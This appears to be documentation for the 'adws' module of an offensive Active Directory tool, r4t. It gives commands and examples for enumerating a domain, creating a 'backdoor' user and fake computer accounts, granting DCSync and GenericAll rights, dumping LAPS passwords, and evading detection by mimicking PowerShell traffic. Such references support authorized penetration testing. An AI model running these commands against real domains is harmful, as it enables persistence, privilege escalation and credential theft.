Skip to main content

adws

Active Directory Web Services (ADWS) operations. ADWS is the transport layer used by PowerShell’s ActiveDirectory module — it communicates over port 9389 using SOAP/NBFS rather than raw LDAP. R4t implements ADWS as a fully-featured alternative to the ldap command.

Usage

r4t adws <subcommand> [flags]
Persistent Flag:
FlagShortDescription
--verify-VVerify the operation succeeded by re-reading the modified object

Subcommands

adws query

Execute an arbitrary LDAP filter query via ADWS. 
r4t adws query --filter "(objectClass=user)"

# Return specific attributes
r4t adws query --filter "(&(objectClass=user)(adminCount=1))" --attrs samAccountName,memberOf

# Limit results
r4t adws query --filter "(objectClass=computer)" --attrs name,operatingSystem --max 50
FlagShortDescription
--filter-FLDAP filter [required]
--attrs-AAttributes to return (repeatable)
--max-MMaximum results (default: 100)

adws get

Query specific AD object types. 
r4t adws get <object-type> [name] [flags]

Object Types

TypeArgumentDescription
usersAll user accounts
computersAll computer accounts
groupsAll security and distribution groups
ousAll Organizational Units
maqMachine Account Quota
passpolDomain password policy
funclvlDomain/forest functional level
domainDomain information
forestForest information
dcsAll domain controllers
trustsDomain trust relationships
user<samAccountName>Specific user
computer<samAccountName>Specific computer
group<samAccountName>Specific group
ou<name>Specific OU
dnObject by DN (--dn required)
dacl<object>DACL on an object
daclsDACLs for all high-value objects
gplink<object>GPO links on a container
gplinksAll GPO links in the domain

Flags

FlagDescription
--attrsComma-separated attributes to return
--activeFilter to only active/enabled objects (for users, computers)
--personFilter to only person-type users (for users)
--no-truncateDon’t truncate long values (for group)
--dnDistinguished Name to look up (for dn)
--resolveResolve SID/GUID to names (for dacl, dacls)
--as-userShow effective rights as a specific user (for dacl, dacls)
--as-groupShow effective rights as a group member (for dacl, dacls)

Examples

# Get all users
r4t adws get users

# Get only active users with specific attributes
r4t adws get users --active --attrs samAccountName,memberOf,lastLogon

# Get a specific user
r4t adws get user jsmith

# Get a specific computer
r4t adws get computer WS01$

# Get a group with member list (no truncation)
r4t adws get group "Domain Admins" --no-truncate

# Get all domain controllers
r4t adws get dcs

# Get machine account quota
r4t adws get maq

# Get object by DN
r4t adws get dn --dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com"

# Get DACL for an object (with SID resolution)
r4t adws get dacl "CN=Domain Admins,CN=Users,DC=corp,DC=example,DC=com" --resolve

# Get all high-value DACLs
r4t adws get dacls --resolve

# Get GPO links on an OU
r4t adws get gplink "OU=Workstations,DC=corp,DC=example,DC=com"

# Get all GPO links
r4t adws get gplinks

adws create

Create new AD objects. 
r4t adws create <object-type> <name> [password] [flags]
TypeArgumentsDescription
user<samAccountName> <password>Create a new user account
computer<hostname> <password>Create a new computer account
group<samAccountName>Create a new security group
ou<name>Create a new Organizational Unit
FlagDescription
--ouParent OU DN for the new object (for user, computer, group)
--parentParent DN for the new OU

Examples

# Create a user
r4t adws create user backdoor 'P@ssword1' --ou "CN=Users,DC=corp,DC=example,DC=com"

# Create a computer account
r4t adws create computer FAKEPC$ 'RandomPass123!'

# Create a group
r4t adws create group "Evil Admins" --ou "CN=Users,DC=corp,DC=example,DC=com"

# Create an OU
r4t adws create ou "Staging" --parent "DC=corp,DC=example,DC=com"

adws modify

Modify existing AD objects. 
r4t adws modify <subcommand> [flags]
SubcommandArgumentsDescription
user<samAccountName>Modify user attributes
computer<hostname>Modify computer attributes
group<samAccountName>Modify group attributes
ou<name>Modify OU attributes
attrModify a specific attribute by DN
remove-group-member<groupName>Remove a member from a group
dacl<object>Modify the DACL of an object
gplink<object>Modify GPO links on a container

Flags for modify user/computer/group/ou

FlagDescription
--attrsAttributes to set in key=value format [required]

Flags for modify attr

FlagDescription
--dnDN of the object to modify [required]
--attrAttribute name to modify [required]
--valueNew value
--opOperation: replace, add, delete

Flags for modify remove-group-member

FlagDescription
--member-dnDN of the member to remove [required]

Flags for modify dacl

FlagDescription
--trusteeAccount to grant/revoke rights to
--generic-allGrant GenericAll
--dcsyncGrant DCSync rights (Replicating Directory Changes All)
--rbcdGrant Resource-Based Constrained Delegation rights
--shadow-credGrant shadow credential write rights
--set-ownerSet as owner of the object
--restoreRestore original DACL
FlagDescription
--gpo-guidGUID of the GPO
--linkCreate a new GPO link
--unlinkRemove a GPO link
--enforcedSet the GPO link as enforced
--restoreRestore original GPO links

Examples

# Modify user attributes
r4t adws modify user jsmith --attrs "description=Test account"

# Modify specific attribute by DN
r4t adws modify attr --dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com" \
  --attr servicePrincipalName --value "HTTP/app.corp.example.com" --op add

# Remove user from group
r4t adws modify remove-group-member "Domain Admins" \
  --member-dn "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com"

# Grant DCSync rights to a controlled account
r4t adws modify dacl "DC=corp,DC=example,DC=com" --trustee backdoor --dcsync

# Grant GenericAll on a target object
r4t adws modify dacl "CN=jsmith,CN=Users,DC=corp,DC=example,DC=com" \
  --trustee backdoor --generic-all

# Link a GPO to an OU
r4t adws modify gplink "OU=Workstations,DC=corp,DC=example,DC=com" \
  --gpo-guid "{12345678-1234-1234-1234-123456789012}" --link

adws delete

Delete AD objects. 
r4t adws delete <subcommand>
SubcommandArgumentsDescription
dnDelete by DN (--dn required)
user<samAccountName>Delete a user
computer<hostname>Delete a computer
group<samAccountName>Delete a group
ou<name>Delete an OU
# Delete by DN
r4t adws delete dn --dn "CN=backdoor,CN=Users,DC=corp,DC=example,DC=com"

# Delete user
r4t adws delete user backdoor

# Delete computer
r4t adws delete computer FAKEPC$

adws laps

Interact with LAPS (Local Administrator Password Solution) via ADWS. 
r4t adws laps <subcommand> [computer]
SubcommandArgumentsDescription
enabled[computer]List computers with LAPS enabled (or check a specific one)
dump[computer]Dump readable LAPS passwords (or for a specific computer)
permissions[computer]Show principals with LAPS read access
set<computer> <password>Set the LAPS password for a computer
# List all LAPS-enabled computers
r4t adws laps enabled

# Dump all LAPS passwords you can read
r4t adws laps dump

# Get LAPS password for a specific computer
r4t adws laps dump WS01

# See who can read LAPS passwords for a specific machine
r4t adws laps permissions WS01

# Set a LAPS password (requires write access)
r4t adws laps set WS01 'NewLAPSpass123!'

ADWS vs LDAP

Featureadwsldap
Port9389389 / 636
ProtocolSOAP over NBFSRaw LDAP
Detection profileLower (mimics PowerShell AD module)Standard LDAP queries
Query obfuscationVia ADWS transportVia el-dap
CoverageFull parityFull parity
Both commands populate the same underlying database tables.